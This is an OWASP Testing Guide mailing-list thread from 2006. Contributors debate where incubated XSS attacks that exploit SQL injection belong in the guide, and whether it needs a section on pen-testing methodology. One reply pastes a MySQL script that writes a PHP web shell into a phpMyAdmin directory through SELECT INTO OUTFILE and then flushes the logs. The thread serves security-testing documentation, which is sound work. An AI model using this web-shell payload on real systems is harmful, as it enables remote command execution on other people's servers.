[Owasp-testing] Brainstorming about the new Index

Ariel Waissbein wata.34mt at coresecurity.com
Thu Oct 12 17:37:19 EDT 2006


You are right. It is a simple XSS incubated attack.

But on the other hand, now that I continue to think about it... What
about using a SQL-injection vulnerability to upload code to the Db, next
if the server has shell enabled this can be used to execute this code?
(I Googled an example of sth like this for attacking PHP's PMA that I
copy below.)

The point is that if the pentester discovers a SQL-injection, he might
be able to do a lot of things. It appears that the SQL-injection gives
the pentester a new /asset/ (the ability to make certain queries to
certain tables in the Db). After it, with all the information he has
gathered so far, the pen tester will decide what to do. Probably, he
will want to research the implications of the SQL-injection
vulnerability. Collegue Gerardo Richarte has proposed this methodology
(see, e.g., slides form his PacSec Japan 2003 talk) over the traditional
(IG, Attack, Pentrate and report) approach.

Moreover, sometimes during a pen test it isn't just enough to discover a
SQL-injection. You need to prove the impact of this vulnerability to
developers that think it is inofensive and shouldn't be fixed.

Then my question is: should we include a prelude on pen testing
methodology before 4.1? Then, in accordance with Matt's suggestion,
should each section (e.g., XSS incubated attacks) include a subsection
where all the attacks assume that condition X holds (where X is some
sort of SQL-injection vulnerability was found, or such permissions are
badly set, et cetera)? I think this might be beneficial to the readers.

Ariel

--

use mysql;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values
('<? $cmd = $_REQUEST["-cmd"]; ?>
<html>
<head><title>help.php</title></head>
<onLoad="document.forms[0].elements[-cmd].focus()">
<form method=POST>
<br>
<input type=TEXT name="-cmd" size=64 value="<?=$cmd?>">
<hr>
<pre>
	<? if($cmd != "") print Shell_Exec($cmd); ?>
</pre>
</form>
</body>
</html>');
SELECT * INTO OUTFILE 'C:/public_html/phpmyadmin/help.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

Matteo Meucci wrote:
> Yes,
> I think you are right: this paragraph already exists.
> look at:
> (http://www.owasp.org/index.php/OWASP_Testing_Guide_v2_Table_of_Contents)
> 4.6 Data Validation Testing 0% TD
> 4.6.1 Cross site scripting 0% TD
> 4.6.1.1 Incubated attacks 0% TD
> 
> Ariel may be says that Incubated attacks are a combination of SQL Inj
> and XSS, but we can reasonably affirm that is a particular XSS attack.
> In the same paragraph we can show an example that how a XSS Inc Attack
> works exploiting an SQL Inj vulnerability.
> Right?
> 
> Mat
> 
> 
> 
> On 10/12/06, Eoin <eoinkeary at gmail.com> wrote:
>> Hi,
>> incubated attacks are important enough to warrant a section under XSS.
>> It is
>> another varient of XSS.
>> Metteo what do you think?
>>
>>
>>
>> On 11/10/06, Ariel Waissbein <wata.34mt at coresecurity.com> wrote:
>> > Hi all,
>> >
>> > my first post and 2 cents here:
>> >
>> > I guess we should make a difference between the techniques of unit
>> > testing and the results of UT. Even if UT can be used to... e.g.,
>> > discover BO or SQL-injection vulns.
>> >
>> > Although, I noticed that there is an Appendix for fuzzing which is
>> > another technique for discovering (some) vulnerabilities.
>> >
>> >
>> > A new question: imagine the following situation: The pen tester
>> > discovers a SQL-injection vulnerability in a webapp he is auditing.
>> This
>> > vuln. allows him to store some javascript in the Db and therefore
>> > perpetrate a XSS attack (incubated) on the users of this webapp.  My
>> > question is where do we describe this attacks? (I think they are
>> > important enough to be included somewhere.)
>> >
>> > Cheers,
>> > Ariel
>> >
>> > Eoin Keary wrote:
>> > > Hi,
>> > >
>> > > Question:
>> > > Do we want to get into Unit Testing and SDLC methodology in this
>> guide?
>> > > I thought they would be more suite to Andrews dev guide or the code
>> > > review project.
>> > > unit testing is related to testing small blocks of a syaytem
>> > > individually and hence a development phase done prior to system and
>> > > integration testing.
>> > > The Guide currently focuses on penetration testing which is "After
>> the
>> > > Fact" testing and not really one until the system in developed.
>> > >
>> > > What y'all think?
>> > >
>> > > Eoin
>> > >
>> > _______________________________________________
>> > Owasp-testing mailing list
>> > Owasp-testing at lists.owasp.org
>> > http://lists.owasp.org/mailman/listinfo/owasp-testing
>> >
>>
>>
>>
>> -- 
>> Eoin Keary OWASP - Ireland
>> http://www.owasp.org/local/ireland.html
>>  http://www.owasp.org/index.php/OWASP_Testing_Project
>> http://www.owasp.org/index.php/OWASP_Code_Review_Project
>> _______________________________________________
>> Owasp-testing mailing list
>> Owasp-testing at lists.owasp.org
>> http://lists.owasp.org/mailman/listinfo/owasp-testing
>>
>>
>>
> 
> 



More information about the Owasp-testing mailing list